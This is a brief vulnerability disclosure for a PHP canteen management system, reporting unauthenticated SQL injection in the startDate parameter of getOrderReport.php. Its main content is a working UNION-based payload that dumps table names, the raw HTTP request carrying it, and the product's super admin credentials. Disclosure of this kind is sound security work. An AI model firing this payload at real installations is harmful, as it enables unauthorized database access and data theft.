Discovered Day: 5/1/2023 Vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html
Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)
Vulnerability File: /php_action/getOrderReport.php
Vulnerability location: /php_action/getOrderReport.php, startDate
CVSS 3.0: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Payload: startDate=2023-01-05'+UNION+ALL+SELECT+4406,CONCAT(0x716a627a71,IFNULL(CAST(table_name+AS+NCHAR),0x20),0x716a6a7071),4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema+IN+(0x796f757468617070616d)--+-
POST /youthappam/php_action/getOrderReport.php HTTP/1.1
Host: localhost
Content-Length: 297
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="104"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://localhost/youthappam/report.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
startDate=2023-01-05'+UNION+ALL+SELECT+4406,CONCAT(0x716a627a71,IFNULL(CAST(table_name+AS+NCHAR),0x20),0x716a6a7071),4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema+IN+(0x796f757468617070616d)--+-&endDate=2023-01-06
The request can be sent by an unauthenticated user, for that reason, the CVSS of this vulnerability is 9.8
The value of startDate parameter was passed to the SQL query and executed without any sanitized.
